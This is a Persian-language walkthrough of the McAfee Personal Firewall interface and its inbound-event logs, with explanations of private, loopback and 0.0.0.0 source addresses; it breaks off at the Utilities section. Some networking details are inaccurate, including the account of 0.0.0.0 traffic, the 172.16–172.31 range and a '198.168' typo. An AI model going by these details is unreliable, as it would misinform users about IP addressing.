http://img.villagephotos.com/p/2004-8/800476/MC-1-1_resize.jpg
خوب به صفحه بعد ميريم
Applications Summary :
جايي كه نرم افزار هاي فعال كه به اينترنت متصل ميشويد رو وضعيتشون رو نشون ميده.در اين قسمت در وسط صفحه گزينه ايي داره كه نوشته:ترافيك مونيتور كارش اينه كه آخرين اطلاعات رو ظرف 10 دقيقه گذشته رو به شما نشون ميده كه 3 تا گزينه داره كرنت ريت،اوريج ريت،ماكسيمم ريت كه در جلوي هر كدومشون نوشته In و On كه مقدار اطلاعات مبادله شده رو برحسب كيلو بايت در اين سرعت ها كه نوشتم رو مشخص ميكنه.در قسمت پايينش نوشته:اكتيو اپليكيشنز كه نام برنامه هايي كه از باند ويچ شما در زمان اتصال شما به اينترنت استفاده ميكنن و درصد فعاليتشون و مقدار اجازه ايي كه شما به آن برنامه داده ايد رو ظرف مدت زمان هايي كه در جلوشون نوشته رو براتون مشخص ميكنه.در قسمت رابط هاي سمت راست اين صفحه زياد فرق زيادي با قبلي نداره فقط در قسمت بالا نوشته:What's New? كه درقسمت پايينش يه لينكي براي شما قرار داده كه روش نوشته:موراينفورميشن با كليك بروي آن شما به ليستي از نرم افزارهاي مجاز كه ميتونن به اينترنت وصل بشن رو طبق استاندارد هاي جهاني خواهيد يافت وهمچنين در رابط آخري هم فقط گزينه سومش در اين صفحه تغيير كرده كه روش نوشته:مودفي سيستم سرويس با كليك بروي آن شما قادر خواهيد بود تا ليست سرويس هايي را كه مي خواهيد اين فايروال براي شما اعمال كند رو مشخص كنين.

خوب به صفحه سوم ميريم
Event Summary :
جايي كه كليه رخداد ها رو در زمان اتصال شما به اينترنت نشون ميده از قبيل:نشان دادن شماره پورت ها و آي پي هايي كه در زمان اتصال به اينترنت به شما حمله كرده اند و همچنين منبع آي پي ها و همچنين آخرين حمله اون آي پي و تعداد كل حملاتش كه همه اين اطلاعات رو هم به وسيله متني و هم به صورت يك نمودار دايره ايي شكل با رنگ ها متفاوت كه مربوط به هر پورت ميشه رو نشون ميده.در قسمت رابط هاي سمت راستتون گزينه اول سر جاش باقيه،گزينه دوم كه نوشته:Last Event آخرين اطلاعات رو در مورد آي پي و شماره پورتي كه سعي كردن به دستگاه شما نفوذ كنن رو نشون ميده و در قسمت پايينش 2 تا گزينه نوشته:يكي ترست ديس آي پي آدرس(كه يعني آيا به اين آي پي اعنماد داريد) و دوميش هم :تريس ديس اونت هست(به معني اين كه اين آي پي رو مسير يابي كنه،اگه بروي اين گزينه كليك كنين بروي نقشه جهان مسير اين حمله ،كشور حمله كننده،مقصد حمله و......... خيلي اطلاعات ديگه در اختيارتون ميزاره. در قسمت رابط سوم گزينه اول نوشته:Add Trusted IP Address (با كليك بروي آن ميتونين آي پي هاي مورد اطمينان خودتون رو وارد كنين).گزينه دومش نوشته:Manage Banned IPs (با كليك بروي اين قسمت ميتونين به اداره آي پي هاي مسدود شده بپردازين).گزينه سومش نوشته:View Inbound Events (با كليك بروي آن شما ميتونين به مشاهده آخرين رويدادها واتفاقات بپردازين توجه كنين كه با كليك بروي اين قسمت به قسمت اينباند اونت يعني گزينه سوم سمت راست منوي اصلي ميره).

خوب به صفحه چهارم ميريم
Hacker Watech Summary :
جايي كه كليه گزارش ها رو در مورد تمامي ويروس هاي و برنامه هاي جاسوسي رو براي شما از طريق اتصال به سايت HacherWatch.org فراهم ميكنه و شما ميتون با اتصال به آن آخرين گزارش ها در مورد ويروس ها و نحوه كار كردن آنها رو به طور كامل مطالعه كنين و راه كار هاي آن را بفهميد- كه اين قسمت رو ميشه به عنوان يك ويژگي خيلي خوب و خاص حساب كرد.
در قسمت رابط هاي سمت راست اين صفحه در رابط اول كه نوشته Event Tracking آخرين ومهمترين گزارش هارو در مورد مبادله اطلاعاتي كه كردين در 24 ساعت گذشته،7 روز گذشته و 30 روز گذشته رو به شما ارائه ميده.در رابط دوم كه نوشته:Global Port Activity آخرين گزارش هارو طي 5 روز گذشته از سايت:HackerWatch.org در مورد حمله از درگاه هايي كه به شما شده رو به صورت خيلي جالب و گرفيكي معين ميكنه.در رابط سوم هم با كليك بروي گزينه اول شما رو به صفحه اول سايت مذبور ميبره،با كليك بروي گزينه دوم شما ميتونين با وصل شدن به سايت مذبور سوالات خود رو بپرسيد و همچنين ليستي از سوال ها و جواب ها رو ببينيد.در گزينه سومش هم با كليك بروي آن ميتوانيد جزئيات كامل در مورد نقشه فعال جهاني رو به صورت گرافيكي مشاهده كنيد البته با وصل شدن به سايت مذبور.

2- قسمتInternet Applications:
در اين صفحه شما باليستي از برنامه هايي كه از شما درخواست اتصال به اينترنت رو كرده اند مواجه ميشويد در قسمت اول نام اون برنامه در قسمت بعد نام فايل اجرايي اون برنامه و در قسمت آخر هم مقدار اجازه ايي كه شما براي اتصال آن تعيين كرده ايد نمايش داده ميشود.شما ميتونين با كليك بروي هر برنامه در قسمت پايين منويي كه اشاره كردم به شرح كليه جزئيات اون برنامه دست پيدا كنيد كه به اين قسمت Applications Details گفته ميشه.در قسمت روبروي همين اپليكيشنز ديتيلز يك رابط وجود داره به نام:Change Permission To.... قرار داره كه شما در اونجا ميتونين به تغيير سطح دسترسي اون برنامه به شبكه بپردازين
http://img.villagephotos.com/p/2004-8/800476/MC-2-2.jpg
- قسمت Inbound Events :
خوب در اين قسمت شما با مشخصات كامل حمله هايي كه به شما شده مواجه ميشويد كه اين اطلاعات بدين شرح هستن:زمان و تاريخ حمله،آي پي منبع،نام ميزبان و شماره پورت و پروتكلي كه حمله شده رو براتون مشخص ميكنه.در قسمت پايين اين ليست قسمتي داره به نام:Event Information كه اطلاعات كامل دقيقي از اون حمله رو در اختيارتون ميزاره و در قسمت روبه روي همين قسمت رابطي وجود داره با نام:I Want To.... كه داري 5 گزينه است بدين صورت:

Trace This Event(به معني اين كه اين رويداد رو يعني اون حمله ايي كه به شما شده رو براتون مسير يابي كنه)
Report This Event ( كارش گزارش در مورد اين رويداد است- يعني حمله ايي كه شما در بالا اون رو مشخص كرده ايد)
Get More Infermation (كارش دادن اطلاعات بيشتره در صورتي كه اطلاعات ارائه شده براتون كافي نباشه)
Trust This Address (كه با يك آيكون كوچولوي مثل تابلو راهنمايي مشخص ميشه با چراغ سبز رنگ - با كليك بروي اين گزينه شما براي فايروال معين مي كنيد كه مثلا اين آي پي كه به من حمله كرده من بهش اعتماد دارم،اين جوري)
Ban This Address (به معني مسدود كردن اون شماره آي پي براي هميشه

http://img.villagephotos.com/p/2004-8/800476/MC-3.jpg
شناخت رويداد ها و حمله ها:

1- در باره آدرس هاي آي پي:
آدرس هاي آپ پي غير معمول به 3 دسته تقسيم ميشن:

A - Non-Routable IP Addresses :
اين آدرس هاي آي پي نمي تونن از شبكه اينترنت استفاده كنن.قالب اختصاصي اين آي پي ها اين جوريه:10.x.x.x ،172.16.x.x ،172.31.x.x و 192.168.x.x .

B - Loop - Back IP Addresses :
آدرس هايي هستند كه براي تست كردن هدف مورد استفاده قرار مي گيرن. اين آدرس ها به عنوان يك ابزار مورد استفاده قرار نمي گيرن و اصولا براي تست كردن قطعات سخت افزاري و نرم افزاري مورد استفاده قرار مي گيرن قالب اين نوع آي پي ها اين جوريه:127.x.x.x

c - Null IP Address :
اين آدرس هاي آي پي پوچ و بي ارزشي هستن وقتي كه اين گونه آپ پي را ملاحظه كرديد بدانيد كه فقط براي نشان دادن و ايجاد ترافيك بروي شبكه به كار مي رن و فرستنده اونها با تامل ميشينه و بسته هايي رو براي ايجاد ترافيك مي فرسته و هيچ گونه جوابي هم دريافت نميكنه،قالب اين آي پي ها با 0 شروع ميشه:0.x.x.x مثلا آي پي 0.0.0.0 يكي از همين نوع آي پي هاست.

2- حمله هاي از 0.0.0.0 :
اگر شما حمله ايي از اين نوع آي پي آدرس ها ديديد، در اين گونه زمان ها كلا دو حالت دارن:
حالت اولشون كه بيشتر معموله اينه كه آيا اين گونه بسته هاي خرابكار از طرف كسي براي كامپيوتر شما ارسال شده؟،اينترنت هميشه 100% قابل اطمينان نيست و اين جور بسته هاي خرابكار هميشه هستن،وقتي كه فايروال حرفه ايي مك آفي اين گونه بسته هاي خرابكار رو مي بينه قبلش با پروتكل TCP/IP چك ميكنه تا ببينه آيا اين بسته ها معتبر هستن يا نه بعد و بعد گزارش خودشو در قسمت رويداد ها مينويسه.
حالت دومي كه اتفاق مي افته به اين صورته وقتي كه شما منبع يك آي پي قلابي رو ميبينيد چي؟ بسته هاي قلابي ممكنه نشاني باشن از كساني كه به اسكن و جستجوي تروجان ها هستن و در اكثر موارد سعي ميكنن كه به دستگاه شما نفوذ كنن.اين مسئله خيلي مهمه كه فايروال حرفه ايي مك آفي اونها رو مسدود ميكنه پس خطري كامپيوتر شما رو تهديد نميكنه.

3- حمله هايي از 127.0.0.1 :
حمله ها در بسياري از موارد از اين نوع منبع آي پي:127.0.0.1 صورت خواهند گرفت .اين تذكر مهم را هم بهتون بدم كه اين نوع آي پي ها خاص از نوع LOOP BACk هستن كه در قسمت قبل براتون توضيح دادم.اساسا اهميت نداره كه شما بروي چه كامپيوتر ي هستين اين نوع آي پي عموما منتسب است به خوده شما،چه جوري؟ اين آدرس هاي آي پي مربوط ميشن به ميزبان محلي به عنوان مثال كامپيوتري كه ناميده ميشه ميزبان محلي هميشه درصدد حل تكيه زدن بروي اين نوع آي پي هاست.
سوال ديگه ايي كه مطرح ميشه اينه كه آيا اين نوع ابزار ميتونه راهي رو براي نفوذ هكر ها بزاره؟آيا بعضي از تروجان ها و اسپي وارها يا همون برنامه هاي جاسوسي ميتونن به دستگاه شما نفوذ كنن؟ محتملا نه،اكثر برنامه هاي مورد اعتماد هم از آدرس ها LOOP BACK براي اتصال استفاده ميكنن.براي مثال:بسياري از سرويس دهندگان وب و ايميل معمولا به شما اين اجازه رو ميدن كه شكل و نحوه اتصالتون به وب رو طوري كه دوست دارين تنظيم كنين.چيزهايي شبيه:http//:localhost/.
به هر حال فايروال هاي شخصي اجازه عبور برنامه ها رو ميدن،بنابراين اگر شما حمله هايي از نوع 127.0.0.1 مشاهده كردين در اكثر موارد منبع اين نوع آدرس هاي آي پي بي ارزش و قلابيه.بسته هاي قلابي معمولا نشانه ايي از تروجان هاي در حال جست وجو هستن و همچنين خوبه كه اينو بدونيد اين فايروال اين نوع حمله ها رو بلوك ميكنه و درنتيجه دستگاه شما در امانه و جاي هيچ نگراني نيست.از طرف ديگه هستن بعضي ار برنامه ها كه ميشه سرآمد اونا رو ميشه از نت اسكيپ 6.2 و مدل هاي بالاترش رو نام برد كه از شما درخواست مي كنن كه اين نوع آي پي يعني : 127.0.0.1 رو به ليست آي پي هاي قابل اعتمادتون اضافه كنيد متاسفانه روش برقرار كردن ارتباط اين نوع برنامه ها با يكديگر به اين صورته و در اينجا فايروال نمي تونه تعيين كنه كه اين ترافيك محليه يا نه و شما خودتون بايد با دست بردن به قسمت Option فايروالتون كارهاي مربوطه رو انجام بدين.براي مثال :Netscape 6.2 ،اگر شما به درخواست اين برنامه عمل نكنيد شما ديگر قادر نيستيد كه از اون استفاده كنين.بنابراين اگر شما ترافيكي مشاهده كردين از طرف 127.0.0.1 و ديد كه همه برنامه هاي كاربرديتون هم دارن به صورت نرمال كار مي كنن،پس با اطمينان خاطر اين نوع حملات كه ترافيك ايجاد مي كنن رو بلوكشون كنيد و بدانيد كه اين يه مشكله ثابته كه برنامه هايي از قبيل نت اسكيپ،در قسمت آي پي هاي قابل اعتماد فايروال ايجاد مي كنن.اگر آي پي هاي 127.0.0.1 در ليست آي پي هاي قابل اعتماد قرار بگيرن مشكل ايجاد مي كنن چرا؟ چون اگر شما به اين نوع آي پي ها اطمينان كنيد، اين برنامه ها كار خواهند كرد، اما شما با اين كارتون راه هاي زيادي براي برنامه هاي مخرب باز مي گذاريد ولي اگه اين ها رو بلوك كنين با اينكه اون برنامه ديگه كار نمي كنه اما ديگه شما در برابر اين حملات و ترافيك مخرب محافظت ميشين.(اين جوري بهتر نيست؟)

4- حمله هاي پوشيده يا Private IP :
آي پي آدرس هايي كه با اين نوع ساختار هستن:192.168.xxx.xxx و 10.xxx.xxx.xxx و 172.16.0.0 و 172.31.255.255 اكثرا از نوع non-routable يا Private IP هستند.اساسا اين نوع آي پي آدرس ها در شبكه شما نيستن و در شبكه هاي خصوصي بيشتر مشاهده ميشن و اكثر مواقع هم ميشه بهشون اعتماد كرد.آي پي هايي با ساختار 192.168 براي برنامه Internet Connection Share (ICS ) مورد استفاده قرار مي گيرن.اگر شما هم از ICS استفاده مي كنيد و رويداد هايي از اين ساختار آي پي مشاهده كرديد،مي تونين همه آي پي هايي كه از اين نوع 198.168.xxx.xxx رو به ليست آي پي هاي مطمئن خودتون اضافه كنيد.اگر شما از شبكه خصوصي استفاده نمي كنيد(Private network ) و يه سري رويداد از اين نوع حوزه آي پي دريافت كردين ،ممكنه كه منبع اين آي پي قلابي و پوچ باشه .باز هم اين نكته مهم رو ميگم كه بسته هاي قلابي هميشه يك نشانه از اسكنر هايي هستند كه به دنبال تروجان بروي دستگاه ها مي گردن.


فقط در آخرين بحث اين صفحه:در قسمت بالاي اين صفحه كه نوشته:Inbound Event (Change Event) و داراي يك فلش به سمت پايين است،در اين جا شما ميتونين نوع نشان دادن اين رويداد ها رو تعيين كنيد،مثلا تعيين كنيد كه آخرين حمله هاي امروز رو براتون نشون بده يا آخرين حمله اين هفته يا اين كه كل اين حملات رو براتون نشون بده.

4- قسمت Utilities :وقتي كه وارد اين صفحه ميشين با 2 قسمت :Settings و Tools رو به رو ميشين.
ابتدا به توضيح آيكن هاي بخش Setting